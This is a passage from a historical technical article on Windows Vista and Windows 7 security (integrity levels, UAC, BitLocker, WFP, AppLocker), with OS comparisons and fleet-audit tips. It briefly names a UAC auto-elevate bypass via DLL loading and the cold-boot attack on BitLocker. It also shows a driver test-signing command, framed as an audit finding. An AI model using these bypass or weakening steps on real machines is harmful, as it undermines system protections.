Vista's replacement for the Windows 2000 to XP-era Windows File Protection / SFC catalog-and-replace mechanism. WRP is ACL-based: protected files and registry keys are owned by `TrustedInstaller` and the DACL restricts modify access to `TrustedInstaller` itself; administrators can take ownership but cannot modify protected resources directly without that step. The protection also covers registry keys, which the older WFP did not. Note: the acronym "WFP" in this paragraph (Windows File Protection) is unrelated to the "WFP" (Windows Filtering Platform) in section 6.6.

6.6 Windows Filtering Platform

Vista and Server 2008 replace the prior NDIS-IM, TDI, and firewall-hook stack-extension architecture with the Windows Filtering Platform: a kernel-mode framework of filtering layers (transport, network, application-layer enforcement), shims, and callout drivers giving third-party firewalls, IDS/IPS, and content filters a supported extension surface. The Base Filtering Engine in user mode centralises policy. Windows Firewall in Vista and every release thereafter sits on top of WFP.

Forshaw's Project Zero post documents the three-tier architecture directly: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel which is where the firewall processing is handled" [@s-forshaw-projectzero-wfp].

Vista's kernel-mode replacement for the NDIS-IM, TDI, and firewall-hook stack-extension architecture that prior third-party firewalls had hooked into. WFP exposes filtering layers (transport, network, application-layer enforcement) plus a callout-driver API, with the user-mode Base Filtering Engine centralising policy and the Microsoft Protection Service service translating Windows Firewall rules into WFP filters. Note: the acronym "WFP" in this paragraph (Windows Filtering Platform) is unrelated to the "WFP" (Windows File Protection) in section 6.5; they are two unrelated three-letter abbreviations that happen to share initials [@s-forshaw-projectzero-wfp]. flowchart LR A[Windows Firewall policy] --> B[MPSSVC user-mode service] B --> C[Base Filtering Engine BFE user mode] C --> D[TCPIP.SYS kernel-mode filter] E[Third-party firewall or IDS] --> C F[Callout drivers] --> D D --> G[Network packets in or out]

6.7 BitLocker Drive Encryption

BitLocker shipped in Windows Vista Enterprise and Ultimate editions on January 30, 2007, and in Windows Server 2008. Protector modes were TPM-only (seal-to-PCR), TPM+PIN, TPM+startup-key, and recovery-key. The cipher was AES-CBC with the Elephant Diffuser, an additional diffusion layer Niels Ferguson designed specifically for the disk-encryption setting and documented in his August 2006 Microsoft whitepaper "AES-CBC + Elephant Diffuser: A Disk Encryption Algorithm for Windows Vista" [@s-ferguson-bitlocker]. The SKU limitation materially constrained deployment reach -- most Vista consumers ran Home Basic or Home Premium, neither of which included BitLocker at all.

Microsoft's full-volume encryption feature, first shipped in Windows Vista Enterprise and Ultimate (January 30, 2007) and in Windows Server 2008. Original Vista cipher: AES in CBC mode with Niels Ferguson's Elephant Diffuser overlay [@s-ferguson-bitlocker]. Protector modes: TPM-only (seal-to-PCR), TPM+PIN, TPM+startup-key, and recovery-key. The Vista release was edition-gated, which limited deployment reach materially across the consumer Vista base.

The era's load-bearing known weakness for TPM-only mode is the cold-boot attack documented in Halderman et al., "Lest We Remember: Cold Boot Attacks on Encryption Keys," USENIX Security 2008 [@s-halderman-coldboot-jhalderm]. DRAM remanence after power-off plus low-temperature imaging let an attacker reconstruct AES keys from a system whose disk was seal-to-PCR-decrypted at boot. The architectural answer -- TPM+PIN as the configuration for any threat model that includes physical access -- is the same in 2026 as it was in 2008.

6.8 Auxiliary hardening that landed quietly

Several Vista security features did not make front-page reviews but matter for the modern stack. Session-0 isolation moved services out of the interactive user session, closing the cross-session shatter attack on services. Protected Processes for DRM media paths became the precursor of PPL (Protected Process Light), which is the substrate for LSA Protection and Credential Guard.

Windows Defender shipped as built-in antimalware (originally GIANT AntiSpyware, which Microsoft acquired in December 2004) [@s-msft-giant-press-2004]. Network Access Protection (NAP) provided the framework for posture-checking machines before allowing network access -- later superseded by conditional access and never broadly deployed. Cryptography Next Generation (CNG) replaced CryptoAPI and is the substrate every modern Windows crypto operation runs on top of. The Volume Shadow Copy refactor enabled Previous Versions in the file Properties dialog.

The Vista feature table

Vista feature	Attack class defended	Compatibility cost	Status in 2026
UAC + MIC + UIPI	Cross-integrity write, cross-integrity UI injection	Prompt fatigue; admin scripts requiring elevation	ACTIVE (MIC is the substrate of every modern Windows sandbox)
ASLR + DEP refinements	Predictable-address shellcode, stack/heap execution	JIT compilers; non-DYNAMICBASE third-party DLLs	ACTIVE (Force ASLR mandatory in Windows 10)
Inherited PatchGuard + mandatory x64 KMCS	Unsigned-driver rootkits, kernel inline patching	x86/x64 split; test-signing escape hatch	ACTIVE (BYOVD response is post-era; HVCI in Win 10 Anniversary)
Service Hardening	Service-exploit blast radius	LocalSystem-assuming legacy services	ACTIVE
Windows Resource Protection	Direct overwrite of OS files and registry	Administrators cannot directly modify system files	ACTIVE
Windows Filtering Platform	NDIS hooking, unsupported third-party network filters	Third-party firewalls and AV had to port to WFP	ACTIVE (every Windows network filter sits on WFP)
BitLocker Drive Encryption	Data-at-rest exposure on lost / stolen devices	SKU limited to Enterprise + Ultimate; TPM-only is cold-boot-vulnerable	ACTIVE (cipher modernised to AES-XTS in Windows 10)
Session-0 isolation + Protected Processes + Defender + NAP + CNG	Cross-session shatter on services, weak crypto primitives, etc.	Service authors had to handle no-interactive-desktop case	ACTIVE (CNG, Defender); NAP SUPERSEDED-BY conditional access

Eight features. Three audit-mandated corrections. One architectural shift the consumer noticed -- a prompt. The next chapter argues that the prompt the consumer hated is not the breakthrough; the integrity-level stack underneath it is.

7. UAC Is the Surface; MIC Is the Substrate

Every Vista user remembers the prompt. Almost no Vista user can describe what the prompt was actually a prompt for. The prompt is the consumer-visible surface of the integrity-level stack. The integrity-level stack is the architectural achievement -- the first OS-level Windows mechanism to recognise that the discretionary-access-control model of Cutler-era NT could not express the policy that mattered.

Recall the integrity-level SIDs from section 6.1, organised as a small table:

Integrity level	SID	Operational use
Untrusted	`S-1-16-0`	Anonymous, deeply isolated processes (rare in default Windows)
Low	`S-1-16-4096`	Sandboxed processes (IE Protected Mode tab, AppContainer in Windows 8+)
Medium	`S-1-16-8192`	Default for normal user processes
High	`S-1-16-12288`	Elevated processes after UAC consent
System	`S-1-16-16384`	Kernel-mode and the most privileged service hosts

The argument is this. Discretionary access control could not distinguish "Administrator the user" from "Administrator's freshly downloaded script" because both ran with the same access token, and a DACL only encodes which principals can perform which operations. MIC can distinguish them.

The downloaded script runs at Low integrity (web-zone provenance, set by AES and inherited by the spawned process). The user shell runs at Medium or High. The integrity-level check evaluates before the DAC and blocks the cross-integrity write regardless of what the DAC would have permitted. UIPI then closes the second class of cross-integrity attack -- window-message injection -- so the same Low-integrity process cannot use SendMessage to puppet a Medium-integrity window into doing what its DAC would not allow it to do directly.

{` // Illustrative parser. The real PowerShell command is: // whoami /groups /priv // which dumps the SIDs and privileges in the current token. The // "Mandatory Label\\Medium Mandatory Level" line carries the integrity SID.

const sampleWhoamiOutput = ` Mandatory Label\\High Mandatory Level Label S-1-16-12288 BUILTIN\\Administrators Alias S-1-5-32-544 SeLoadDriverPrivilege Load and unload device drivers Enabled SeShutdownPrivilege Shut down the system Enabled `; const intLineRe = /Mandatory Label\\\\(Low|Medium|High|System) Mandatory Level\\s+\\S+\\s+(S-1-16-\\d+)/; const m = sampleWhoamiOutput.match(intLineRe); const elevatedPrivs = ["SeLoadDriverPrivilege","SeTcbPrivilege","SeBackupPrivilege"]; const has = p => sampleWhoamiOutput.includes(p + " ") && sampleWhoamiOutput.includes("Enabled"); if (m) console.log(`Integrity level: ${m[1]} (${m[2]})`); console.log("Likely elevated:", elevatedPrivs.some(has) ? "yes" : "no"); `}

Here is what the Aha lands on. Without MIC, every later Windows containment story -- AppContainer (Windows 8 Modern Apps), the Chromium and Edge browser sandboxes, IE Protected Mode, Office Protected View, Adobe Reader's sandbox, Windows Defender Application Guard, Virtualization-Based Security and Credential Guard -- would have had to invent the per-process trust-level primitive from scratch. Every one of them inherits MIC. The prompt is throwaway; the substrate is permanent. The full integrity-level-stack history through Administrator Protection is traced in the Adminless companion post.

Key idea: UAC is the prompt the user saw. MIC is the substrate every later Windows containment story inherits. The Vista security story is not the UI consent flow most reviewers focused on -- it is the integrity-level SID on every process token and the integrity-level ACE on every securable object, evaluated before the DAC, in the access-check pipeline of every Windows release since.

The prompt the consumer hated is not the breakthrough; the integrity-level stack underneath it is.

If Vista's architecture was right, why was Vista's reception wrong? The answer is not the prompt. The answer is what the prompt interrupted -- the everyday workflow that, on XP, had been a long-uninterrupted sequence of operations the user did not realise required administrative authority. The next chapter is the polish.

8. Windows 7 as the Vista Polish

Windows 7 reached general availability on October 22, 2009. Reviews were positive in a way Vista's never were. The security architecture underneath had barely changed.

The Vista security architecture is preserved almost entirely in Windows 7. UAC, MIC, and UIPI carry forward. BitLocker carries forward, gaining BitLocker To Go for removable drives. Both WFPs (the Filtering Platform and Resource Protection) carry forward. ASLR and DEP carry forward. Service Hardening carries forward, with additional per-service-SID coverage for previously-overlooked service hosts. Mandatory x64 KMCS carries forward. The Security Center is reborn as Action Center with an aggregated maintenance surface alongside the security surface.

Windows 7 did change the integration. UAC gained a four-level slider in Control Panel -- Always Notify, Notify when programs try to make changes (the default), Notify but don't dim the desktop, and Never Notify -- and an "auto-elevate" whitelist for signed Microsoft binaries that the system trusted to elevate themselves without a consent prompt. The slider made the prompt fatigue UI-tunable for the first time. The auto-elevate whitelist, however, is the load-bearing UAC-bypass surface for the next decade.

The auto-elevate whitelist is the surface Leo Davidson's December 2009 essay (sysprep.exe loading CRYPTBASE.dll from %SystemRoot%\System32 after a bind directory redirection) attacked first, and the UACMe catalogue on GitHub maintained an ongoing inventory of roughly 70 distinct UAC-bypass techniques over the following decade. The exact count grows over time -- the GitHub repository is the authoritative reference -- and the order-of-magnitude figure should be read as engineering-folklore shorthand rather than as instrumented telemetry. See the Adminless companion post for the full bypass-technique history and for the 2024 to 2026 Administrator Protection redesign.

AppLocker arrived in Windows 7, replacing the Software Restriction Policies of Windows XP and Server 2003 with a richer rule-collection model: executable rules, MSI rules, script rules, packaged-app rules, and DLL rules, each authorable by path, file hash, or publisher [@s-msft-applocker-overview]. DirectAccess shipped as a pre-VPN seamless remote-access protocol -- ahead of its time and not widely deployed. The reason it was ahead of its time and the reason it failed to deploy widely were the same: DirectAccess required native IPv6 connectivity (with Teredo or 6to4 tunneling as the fallback for IPv4-only networks) and per-machine certificate enrollment for every endpoint and gateway, and in the 2009-to-2014 window most enterprises ran neither IPv6 nor a mature PKI, so the prerequisite stack alone disqualified the protocol from broad rollout.

Microsoft's application-control feature, first shipped in Windows 7 (and Server 2008 R2). AppLocker supersedes Software Restriction Policies with a rule-collection model spanning executables, MSIs, scripts, packaged apps, and DLLs, with each rule authorable by path, file hash, or publisher (Authenticode-signed publisher and product) [@s-msft-applocker-overview].

Vista feature	Windows 7 change	What the change cost or enabled
UAC	Four-level slider; auto-elevate whitelist for signed MS binaries	Less prompt fatigue; new bypass surface via whitelist abuse
MIC + UIPI	Unchanged	--
ASLR + DEP	Loader and policy refinements	Slightly more user-image coverage; not yet mandatory
PatchGuard + KMCS	Unchanged on x64	--
Service Hardening	Coverage extended to additional service hosts	Smaller residual blast radius
Windows Resource Protection	Unchanged	--
Windows Filtering Platform	Refinements for VPN providers	Cleaner third-party integration
BitLocker	BitLocker To Go for removable drives	Encrypted USB sticks become practical
Security Center	Reborn as Action Center	Aggregated maintenance + security surface
(new) AppLocker	Replaces Software Restriction Policies	Richer application control for enterprises

The argument is the obvious one. Windows 7's reception was broadly positive and Vista's reception was broadly negative running on substantially the same security architecture. This is the article's evidence that "user-hostile integration of a correct architecture" is a distinct failure mode from "wrong architecture," and that the integration tax is payable -- if the work is done.

Note: The Vista-era integrity-level architecture is still load-bearing on Windows 11. Every modern sandbox -- browser tab process, AppContainer for a UWP app, the Office Protected View host, the Windows Defender Application Guard container -- builds on the MIC primitive Vista shipped in January 2007. If you maintain a Windows desktop fleet, treat UAC, MIC, and per-service SIDs as the foundational defenses they are, not as legacy artifacts. Companion posts: Adminless on the integrity-level-stack arc through Administrator Protection, and Process Mitigation Policies on the post-era process-mitigations layer.

If Windows 7 proved the architecture, the era's two structural limits proved how much was left to do. The next chapter is humility.

9. Three Operating Systems, Three Answers

Microsoft was not the only operating-system vendor trying to answer the privilege-model question in this window. The same years that produced UAC produced Mac OS X 10.5 Leopard's sandbox and mainlined SELinux on Linux. Each answered the question "which operations get the elevation primitive interposed on them?" with a different default.

macOS 10.5 Leopard, October 2007

Apple shipped Leopard's "seatbelt" sandbox in October 2007, built on Robert Watson's TrustedBSD MAC framework -- the same FreeBSD-derived Mandatory Access Control plumbing that becomes App Sandbox in OS X 10.7 (Lion, 2011) and the sandbox primitive every signed Mac App Store application now runs inside. The sandbox profile language is a Scheme dialect (SBPL); a representative four-line profile reads:

(version 1)
(deny default)
(allow file-read* (subpath "/usr/lib"))
(allow network-outbound (remote tcp "*:443"))

Apple's authopen and Authorization Services APIs are closer to per-operation elevation than Vista's per-process-token model. A typical Authorization Services flow elevates a single file-modification operation -- the canonical example is editing /private/etc/hosts:

authopen -w /private/etc/hosts

The macOS model is "the user is prompted at the moment of the protected operation, the elevation is scoped to that operation, and the rest of the process continues at the user's normal privileges." Vista's model is "the user is prompted at the moment a process needs the high token, the full token is released to the entire process, and the rest of the user session continues under the filtered token."

Linux: SELinux, AppArmor, and sudo

SELinux (originally developed by the U.S. National Security Agency, released to the open-source community in December 2000, mainlined in Linux 2.6.0 in December 2003, and championed downstream by Red Hat in RHEL 4 from February 2005 onwards) is the most thoroughly developed example of Type Enforcement on a mainstream OS. The policy language uses Access Vector rules with security labels:

allow httpd_t httpd_content_t : file { read getattr open };

The semantics are explicit: a process in domain httpd_t may perform read, getattr, and open on a file with label httpd_content_t. The labels travel with the file (extended attributes on disk) and the rules live in a single compiled policy. The model is label-based MAC.

AppArmor (Immunix, then Novell, mainlined in Linux 2.6.36 on October 20, 2010 [@s-linux-2-6-36-kernelnewbies]) takes the opposite philosophical position. A profile is a list of path-based rules:

/usr/sbin/dnsmasq {
  /etc/dnsmasq.conf r,
  /var/lib/misc/dnsmasq.leases rw,
  network inet dgram,
}

The model is path-based MAC: rules apply to filesystem paths rather than to inode labels. sudo persists across both as the practical per-operation elevation primitive, and most production Linux deployments use a mix.

The SELinux-vs-AppArmor distinction is a real architectural disagreement, not a stylistic preference. Label-based MAC ties policy to the data (extended attributes follow the file) but requires that every filesystem operation preserve the labels and that the labels start correct. Path-based MAC ties policy to the file path (a path is a profile lookup key) but means the same data accessed through two different paths can get two different policy verdicts. Both forms ship in mainstream Linux distributions in 2026; the choice is usually a function of which distribution's tooling you started with.

AppArmor's mainline Linux merge is Linux 2.6.36, October 20, 2010 [@s-linux-2-6-36-kernelnewbies]. Upstream secondary references occasionally date the mainline merge to 2009, which is wrong -- 2009 was the announcement-of-intent year; the actual git merge into Linus's tree is October 20, 2010.

Three OSes, three privilege models

OS / year	Primitive	Granularity	Policy authoring	Origin lineage
Vista UAC + MIC + UIPI (Jan 2007)	Per-process token, integrity-level SID	Per-process	Manifest + UAC consent + ACL/MIC ACE	Cutler-era NT access tokens + new MIC layer
Leopard sandbox + Authorization Services (Oct 2007)	Per-operation profile + per-operation auth	Per-operation	SBPL Scheme profile + `authopen` call	TrustedBSD MAC framework
Linux SELinux / AppArmor + sudo (2003 / 2010 / forever)	MAC domain rules + path/label policies	Per-operation via MAC + per-command via sudo	AV rules / profiles / sudoers	NSA / Immunix / BSD-flavour `sudo`

The point is not which model is "better." Vista's UAC is structurally closer to sudo than its critics admitted -- the difference is that sudo is invoked explicitly by the user from a shell, while UAC interposes on operations the user expected to just work. The contrast is about which operations the platform forces through the elevation primitive, and operating systems that pick different answers end up with different reception narratives even when the underlying mechanisms are similar.

If the privilege model is choosable -- if reasonable operating systems pick different answers -- what are the structural limits NONE of the three could escape? That is the next chapter.

10. Theoretical Limits and Era-Specific Lessons

Four structural limits the era revealed. Three of the four were proved in the literature; one was proved by Conficker. None of the four were closed by 2009. Two are closed today; two are not.

Limit 1: The same-privilege paradox

PatchGuard runs at ring 0. Rootkits run at ring 0. PatchGuard is therefore fundamentally bypassable from a sufficiently privileged attacker -- and skape and Skywing's December 1, 2005 Uninformed paper demonstrated three concrete bypass technique classes against the v1 implementation [@s-skape-skywing-patchguard]. PatchGuard v2 (Vista RTM) and v3 (Vista SP1) patched the specific v1 bypasses but could not address the structural issue. The genuine architectural fix waits for Hypervisor-Protected Code Integrity in Windows 10 Anniversary Update (August 2016) and for the VBS, Pluton, and Secured-core PC architectures of Windows 11. All out of era. Part 4 of this series traces them.

Limit 2: The deployment-velocity ceiling (the Conficker bound)

Aggregate installed-base security is bounded by patch-to-field-deployment latency on the slowest cohort, not by patch-release latency. Conficker's 9-to-15-million infections in early 2009 exploited a vulnerability that had been patched for one to four months across the variants [@s-cwg-lessons-learned-2019].

This is the era-closing operational lesson. It motivates Automatic Updates becoming opt-out-by-default (XP SP2, 2004), the mature Patch Tuesday cadence, and -- much later -- the Windows-as-a-Service cumulative-update model of Windows 10 that removes the user's ability to decline updates indefinitely. All-cohort closure remains structurally unattainable as of 2026; this is the era's defining residual.

The structural upper bound on aggregate installed-base security set by patch-to-field-deployment latency on the slowest cohort of machines. A vulnerability becomes safe at population scale only when the patch has propagated to every reachable system, and the slowest cohort's propagation rate dominates the aggregate. Conficker proved that on-by-default architectural mitigations on Vista did not raise the ceiling for the XP and Server 2003 installed base; only patch propagation could. The post-era architectural response is the Windows 10 cumulative-update model.

Limit 3: The compatibility tax on defaults

Every Vista security default that broke an application became a UAC bypass surface (the auto-elevate whitelist), a driver-signing escape hatch (test-signing), or a compatibility shim (DEP OptIn). Defaults that cannot break shipping software cannot be tightened. This is the era's productive failure mode -- it explains why post-Vista security features ship with deprecation runways: mandatory ASLR took until Windows 10 to fully land, mandatory KMCS on x86 never landed at all, and Driver Signature Enforcement on x64 had to coexist with the test-signing escape hatch for the foreseeable future.

Limit 4: The user-hostility tax on correct architecture

UAC was architecturally correct and operationally hated. The Mojave Experiment (July 2008) is the era's confession that the perceptual layer matters as much as the architectural layer. Windows 7's smoothing is the article's evidence that the tax can be paid, if the work is done -- but it has to be paid every time, because the perceptual layer is not learned-once. Windows 8's Modern UI, Windows 11's UAC behaviour adjustments, and the 2024-to-2026 Administrator Protection redesign are all replays of the same question on different sets of users.

Key idea: The era's binding constraints were not the UI. They were architectural -- you cannot defend ring 0 from ring 0, and skape and Skywing proved this in December 2005 -- and operational -- you cannot patch the slowest cohort faster than the worm cadence, and Conficker proved this in late November 2008. The prompt was the symptom. The constraints were the disease. Both were unsolved when Windows 7 shipped.

The Conficker Working Group's June 2010 post-mortem named the binding constraint directly: it is not whether a patch exists, but whether deployment reaches the slowest cohort before the worm does [@s-cwg-lessons-learned-2019].

Era limit	Era-end state (Oct 2009)	2026 state	Forward link
Same-privilege paradox	OPEN	CLOSED for kernel integrity via HVCI / VBS / Pluton	Part 4
Deployment-velocity ceiling	OPEN	NARROWED via Windows-as-a-Service cumulative updates	Part 3
Compatibility tax on defaults	OPEN (per-feature deprecation runways)	OPEN; managed via mitigation slow-ramp deployment	Part 3, Part 4
User-hostility tax on correct architecture	OPEN (Windows 7 smoothed Vista)	RECURRING (re-paid each major release)	Part 6

If the era closed with two structural limits unsolved, what stayed open for the next decade to answer?

11. Open Problems at the End of the Era

Stand at an engineer's desk on Friday, October 23, 2009 -- the day after Windows 7 GA. The previous twelve months had shipped a polished consumer OS, contained Conficker (mostly), and formed an industry-coordination body for the next worm. What does the agenda look like on Monday?

Q1: How do you make the patching cadence faster than the worm cadence?

The era-end answer was a mature Patch Tuesday cadence plus the Microsoft Active Protections Program (MAPP, which gave AV vendors early access to patch details) plus Automatic Updates default-on, but the slowest-cohort lag remained. The post-era answer is the cumulative-update and Windows-as-a-Service model of Windows 10 (July 2015) plus enterprise WSUS scale-out plus the out-of-band cadence the era proved was sometimes necessary. The in-era out-of-band releases were three: the bulletin commonly cited from January 2006 patching the Windows Metafile vulnerability (MS06-001) [@s-msft-ms06-001], the April 2007 out-of-band patching the animated-cursor (.ANI) GDI parsing vulnerability (MS07-017) [@s-msft-ms07-017], and MS08-067 [@s-ms08-067].

The April 2004 LSASS bulletin (the patch that preceded Sasser) was a regular Patch Tuesday release on April 13, 2004 [@s-msft-ms04-011], not an out-of-band release. The in-era out-of-band Microsoft Security Bulletins for wormable-class or actively-exploited-class RCEs are three: the January 2006 Windows Metafile bulletin (MS06-001) [@s-msft-ms06-001], the April 3, 2007 animated-cursor (.ANI) GDI bulletin (MS07-017, patching CVE-2007-0038, which was being actively exploited via drive-by web pages) [@s-msft-ms07-017], and MS08-067 in October 2008 [@s-ms08-067]. The May 8, 2007 Windows DNS RPC RCE bulletin (MS07-029) is sometimes misremembered as an out-of-band release; it shipped on the regular Patch Tuesday cadence [@s-msft-secupdates-index].

The architectural shift the era did not make is the one Windows 10 made: removing the user's ability to indefinitely decline updates on consumer machines. This was politically impossible in 2009 and remains contested in 2026; deferred to Part 3.

Q2: How do you protect kernel integrity from kernel-level attackers?

Era-end answer: PatchGuard runs at the same ring as the attacker; structural bypassability remains. Post-era answer: Hypervisor-Protected Code Integrity in Windows 10 Anniversary Update (August 2016); Virtualization-Based Security and Credential Guard; the Microsoft Vulnerable Driver Block list (2020 onward) for the BYOVD afterlife. Deferred to Part 4.

Q3: How do you separate trust principals more finely than user accounts and integrity levels?

Era-end answer: MIC offered five integrity levels; the granularity is per-process, not per-capability. Post-era answer: AppContainer (Windows 8, which introduces capability SIDs inside a LowBox token so a process can be denied or granted individual platform capabilities such as internetClient independently of its user account); the Modern Apps and Universal Windows Platform manifest-permission model (declarative capability gating at app install time, with the manifest itself authored alongside the app and reviewed at Store submission); and the Windows Subsystem for Linux and Android trust-isolation architectures (per-distribution and per-app isolation contracts that scope filesystem, network, and IPC access to a single guest OS instance). The integrity-level primitive remains the substrate every one of these builds on. Deferred to Part 3 and Part 4.

Q4: How do you ship a security architecture without breaking the user experience?

Era-end answer: Windows 7's polish proves it can be done for one release. Post-era answer: it recurred with Windows 8's Modern UI debacle, the Windows 11 UAC behaviour adjustments, and the 2024 to 2026 Administrator Protection rollout that finally promotes UAC to a security-boundary classification -- traced in the Adminless companion post. The question is recurring -- it is solved per-release, not in principle.

Part 3 picks up the morning after Windows 7 GA with Stuxnet, Operation Aurora, the Enhanced Mitigation Experience Toolkit, and the Process Mitigations era. Part 4 traces the VBS / HVCI / Pluton / Secured-core PC arc that closes the same-privilege paradox. Part 5 covers the credential-theft and Active Directory escalation era (Mimikatz, Pass-the-Hash, the Protected Users group, Credential Guard). Part 6 covers the Administrator Protection redesign and the long arc back to UAC as a security boundary. The shared spine of all five remaining articles is the integrity-level stack Vista shipped.

Four questions on the Monday whiteboard. Three of the four have answers in Parts 3 through 6 of this series. The fourth will outlast the operating system.

12. Reading 2002 to 2008 Windows Documentation in 2026

If you inherit a Vista- or Server 2008-era environment in 2026, or maintain a kernel driver whose support matrix still includes the Vista lineage, or pick up Russinovich, Solomon, and Ionescu's Windows Internals, 5th edition [@s-windows-internals-5e] off the shelf, what should you know that the documentation will not tell you directly?

Reading a `whoami /groups /priv` output on a Vista-or-later machine

The split-token model means the elevated and unelevated tokens differ in their group memberships and privilege lists, not in a single flag. The integrity-level SID line -- Mandatory Label\Medium Mandatory Level or Mandatory Label\High Mandatory Level -- is the right place to look first. Practitioner tip: if the integrity label says High and the privilege list shows SeLoadDriverPrivilege enabled, the token is elevated. If the integrity label says Medium and the privilege list lacks SeBackupPrivilege and SeTakeOwnershipPrivilege, the token is filtered. The Microsoft Learn windows/win32/secauthz/mandatory-integrity-control page is the canonical integrity-level reference [@s-msft-mic-win32].

Reading a Security event-log entry from this era

The Event ID schema changed between XP (5xx range) and Vista (4xxx range); a Vista Event 4624 logon-success entry is not the same as an XP Event 528. The Microsoft Learn windows-security/threat-protection/auditing/ index is the canonical reference for Vista-and-later events. The closest thing to a canonical XP-to-Vista mapping table that Microsoft still publishes is the Appendix L: Events to Monitor page in the Windows Server / Active Directory documentation, whose "Current Windows Event ID" and "Legacy Windows Event ID" columns map post-Vista 4xxx-range identifiers back to their pre-Vista 5xx-range equivalents -- for example, 4624 successful logon mapping to 528/540, 4625 failed logon mapping to 529-537/539, 4634 logoff (kernel-generated when the logon session is destroyed) mapping to 538, 4647 user-initiated logoff mapping to 551, and 1102 audit log cleared mapping to 517 -- for practitioners inheriting mixed XP-and-Vista log estates [@s-msft-events-to-monitor]. Old documentation that uses the 5xx-range numbering is talking about XP and Server 2003.

Reading the MS-bulletin archive

The original microsoft.com/technet/security/bulletin/MS08-067.mspx URL scheme has migrated twice. The current canonical form is learn.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067 [@s-ms08-067]. The parent landing URL learn.microsoft.com/en-us/security-updates/ is the working index [@s-msft-secupdates-index]; the legacy /securitybulletins/ URL returns HTTP 404 in 2026 and is one of the reasons cross-references in older books need patient redirection.

Identifying an era-shaped misconfiguration in a modern audit

Three worked examples readers can run on a Windows 10 or 11 fleet today.

A service running as LocalSystem instead of as its per-service SID. The service inventory in sc.exe qc output or Get-Service | ForEach-Object queries should show NT SERVICE\<servicename> in the principal column for any post-Vista service; if it shows LocalSystem, the service is either pre-Vista in its configuration or has been deliberately escalated. Either case warrants explanation.
An unsigned third-party kernel driver loading via the test-signing escape hatch (bcdedit /set testsigning on). Test-signing should never be enabled on production machines; the desktop watermark exists exactly to make this visible. The audit query is bcdedit /enum {current} | findstr testsigning from an elevated prompt.
A BitLocker volume without TPM+PIN protection on a system whose threat model includes physical access. TPM-only mode is vulnerable to the cold-boot attack documented in Halderman et al., USENIX Security 2008 [@s-halderman-coldboot-jhalderm]. The query is manage-bde -protectors -get C: from an elevated prompt; the output should list a numerical password recovery key plus a TPM+PIN protector for any laptop that leaves the office.

Note: bcdedit /set testsigning on is documented for driver development. It is not appropriate for production systems. A production machine with test-signing enabled accepts kernel drivers signed by certificates the system does not normally trust -- exactly the rootkit-installation path Vista x64's mandatory KMCS was designed to close [@s-msft-driver-signing]. Audit for the watermark and for the bcdedit value; if either is present on a server or end-user machine, treat it as a finding.

The reading list

Note: Parts 3 through 6 of this series each pick up where this one ends: - Part 3: Stuxnet, Operation Aurora, the Enhanced Mitigation Experience Toolkit, the cumulative-update model - Part 4: VBS, HVCI, Pluton, Secured-core PC, the closure of the same-privilege paradox - Part 5: Credential theft, Mimikatz, Pass-the-Hash, Credential Guard - Part 6: Administrator Protection and the long arc back to UAC as a security boundary Companion posts: Windows Access Control: 25 Years of Attacks, Adminless, BitLocker on Windows, Beyond BitLocker, Process Mitigation Policies.

Given the line `Mandatory Label\Medium Mandatory Level Label S-1-16-8192` and a privilege list that includes `SeShutdownPrivilege Enabled`, `SeChangeNotifyPrivilege Enabled`, `SeUndockPrivilege Enabled`, `SeTimeZonePrivilege Enabled` -- and that does NOT include `SeLoadDriverPrivilege`, `SeBackupPrivilege`, `SeTakeOwnershipPrivilege`, or `SeDebugPrivilege` -- the token is the filtered standard-user token. The user is an administrator interactively logged on, but the running shell is operating with the filtered token. To verify, open an elevated PowerShell from the same session and re-run `whoami /groups /priv`: the integrity label will read `High Mandatory Level`, the SID will be `S-1-16-12288`, and the elevated privilege set will be present.

The era is closed. The architecture is not.

13. Frequently Asked Questions

Eight common misconceptions about the era, each anchored to a corrected primary source.

No. PatchGuard shipped first in Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition in April 2005 -- twenty months before Vista RTM. Vista x64 inherited PatchGuard v2; Vista SP1 shipped v3. The cite-ready primary is Microsoft Security Advisory 932596, which states explicitly that PatchGuard is "included with x64-based Windows operating systems" and reads back through XP x64 and Server 2003 x64 [@s-msft-adv-932596]. x86 editions of Vista never received PatchGuard at all. No. MS08-067 was patched out-of-band on October 23, 2008 [@s-ms08-067]. Conficker.A was first detected in late November 2008, anchored to November 20, 2008 in SRI International's technical analysis [@s-sri-conficker-c-addendum]. The first in-the-wild MS08-067 exploitation in October 2008 was Gimmiv.A, a narrower non-self-propagating Trojan, per the NVD CVE-2008-4250 entry -- not Conficker [@s-nvd-cve-2008-4250]. The patch-to-weaponisation gap is approximately twenty-nine days and is the article's load-bearing thesis evidence. No. The HTML-comment Mark-of-the-Web (``) shipped in Internet Explorer 6 Service Pack 1 in 2002. The Attachment Execution Service, two years later in XP SP2, is the system-wide enforcement substrate of the `Zone.Identifier` NTFS Alternate Data Stream -- the persistent file-system anchor that downstream tools (Office Protected View, SmartScreen, Microsoft Defender Application Control) consult to gate execution [@s-msft-iattachmentexecute]. Substrate, not ancestor. No. Russinovich's June 2007 *TechNet Magazine* article states explicitly that "elevations were introduced as a convenience" and that this very fact "prevents OTS elevations from being a security boundary" [@s-russinovich-uac-technet]. The chronologically first published Microsoft-principal record of the same disclaimer is the February 12, 2007 Mark's Blog post that anchors the multi-part TechNet blog series on the restricted-token / integrity-level discussion [@s-russinovich-psexec-blog]. The boundary classification arrives with Administrator Protection in the 2024 to 2026 Windows 11 era; see the [Adminless](/blog/adminless-how-windows-finally-made-elevation-a-security-boun/) companion post. No. Vista's ASLR was opt-in for user code via the `/DYNAMICBASE` linker flag; only system images and `/DYNAMICBASE`-linked binaries were randomised. Full mandatory ASLR for all images is a later-Windows feature -- Force ASLR in EMET and Windows 8, mandatory in Windows 10. The Shacham et al. CCS 2004 paper had already established the brute-force bound: with $n$ bits of entropy, an attacker needs expected $2^{n-1}$ attempts against a process that respawns after crash [@s-shacham-asrandom-ccs2004]; on x86 Vista's 8 bits this is roughly 128 attempts, which is why x64 ASLR (qualitatively more entropy) was the more durable defense. No. BitLocker shipped in Windows Vista Enterprise and Ultimate editions only, plus Windows Server 2008. Most Vista consumers ran Home Basic or Home Premium and got no BitLocker at all. The cipher in Vista was AES-CBC with Niels Ferguson's Elephant Diffuser, documented in his August 2006 Microsoft whitepaper [@s-ferguson-bitlocker]; later Windows releases moved to AES-XTS. 